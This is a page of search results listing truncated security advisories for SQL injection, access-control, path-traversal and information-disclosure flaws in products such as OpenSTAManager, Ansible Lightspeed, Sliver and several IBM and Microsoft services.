28055 matches found
GHSA-4HC4-8599-XH2H OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service
Summary Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attac...
SQL Injection
Overview devcode-it/openstamanager is a management software for technical assistance and electronic invoicing Affected versions of this package are vulnerable to SQL Injection via the term parameter in the global search functionality. An attacker can extract sensitive database contents, including...
SQL Injection
Overview devcode-it/openstamanager is a management software for technical assistance and electronic invoicing Affected versions of this package are vulnerable to SQL Injection via the idarticolo parameter in the article pricing module's completion handler. An attacker can extract sensitive databa...
SQL Injection
Overview devcode-it/openstamanager is a management software for technical assistance and electronic invoicing Affected versions of this package are vulnerable to SQL Injection via the idanagrafica parameter in the init.php file. An attacker can extract sensitive database information, including...
CVE-2025-10258
Infinera DNA is vulnerable to a time-based SQL injection vulnerability due to insufficient input validation, which may result in leaking of sensitive information...
CVE-2026-0598
A security flaw was identified in the Ansible Lightspeed API conversation endpoints that handle AI chat interactions. The APIs do not properly verify whether a conversation identifier belongs to the authenticated user making the request. As a result, an attacker with valid credentials could acces...
CVE-2023-38010
IBM Cloud Pak System displays sensitive information in user messages that could aid in further attacks against the system...
PT-2026-6676
Name of the Vulnerable Software and Affected Versions Ansible Lightspeed affected versions not specified Description The Ansible Lightspeed API conversation endpoints, which manage AI chat interactions, do not adequately confirm if a conversation identifier corresponds to the authenticated user...
DeepAudit 安全漏洞
DeepAudit is an automated vulnerability auditing tool developed by lintsinghua’s individual developers. Versions of DeepAudit 3.0.4 and earlier contain security vulnerabilities. These vulnerabilities stem from improper access control on the /api/v1/users endpoint, which may allow any authenticate...
PT-2026-6848
Summary Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attac...
Red Hat Ansible Automation Platform 2 安全漏洞
Red Hat Ansible Automation Platform 2 is software developed by Red Hat Inc. It is used for building, deploying, and managing automation processes. There is a security vulnerability in Red Hat Ansible Automation Platform 2. This vulnerability stems from the dialogue endpoints that handle AI chat...
Sliver Vulnerable to Website Path Traversal / Arbitrary File Read (Authenticated)
Summary A Path Traversal vulnerability in the website content subsystem lets an authenticated operator read arbitrary files on the Sliver server host. This is an authenticated Path Traversal / arbitrary file read issue, and it can expose credentials, configs, and keys. Affected Component - Websit...
CVE-2025-15482
The Chapa Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.3 via 'chapaproceed' WooCommerce API endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including t...
Ilevia EVE X1 Server
RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary shell commands and the disclosure of sensitive system information. 2. RECOMMENDED PRACTICES CISA recommends users take defensive measures to minimize the risk of exploitation of these...
CVE-2025-33081
IBM Concert 1.0.0 through 2.1.0 stores potentially sensitive information in log files that could be read by a local user...
Microsoft Azure Functions 信息泄露漏洞
Microsoft Azure Functions is a hosted Platform-as-a-Service PaaS provider from Microsoft Corporation USA that delivers event-driven and scheduled compute resources for Azure cloud services. An information disclosure vulnerability exists in Microsoft Azure Functions, which can be exploited by an...
F5 Networks BIG-IP : BIG-IP Edge Client for Windows vulnerability (K000158931)
The version of F5 Networks BIG-IP installed on the remote host is prior to 17.1.3.1 / None. It is, therefore, affected by a vulnerability as referenced in the K000158931 advisory. A vulnerability exists in BIG-IP Edge Client and browser VPN clients on Windows that may allow attackers to gain acce...
phpMyChat Plus SQL注入漏洞
phpMyChat Plus is a chat room system developed by Ciprianmp. Version 1.98 of phpMyChat Plus contains an SQL injection vulnerability. This vulnerability stems from the pmcusername parameter in the deluser.php page, which may lead to the exposure of sensitive database information...
ROS-20260205-73-0001
A vulnerability in the net/can/bcm.c component of the Linux operating system kernel is related to reading outside the allowed data buffer boundaries. Exploitation of the vulnerability may allow an attacker to gain access to sensitive data and also cause a denial of service...
Google Android Information Disclosure Vulnerability (CNVD-2026-10641)
Google Android is a Linux-based open source operating system from Google. Google Android suffers from an information disclosure vulnerability that stems from a key-pairing-based logic error that can be exploited by an attacker to obtain sensitive information...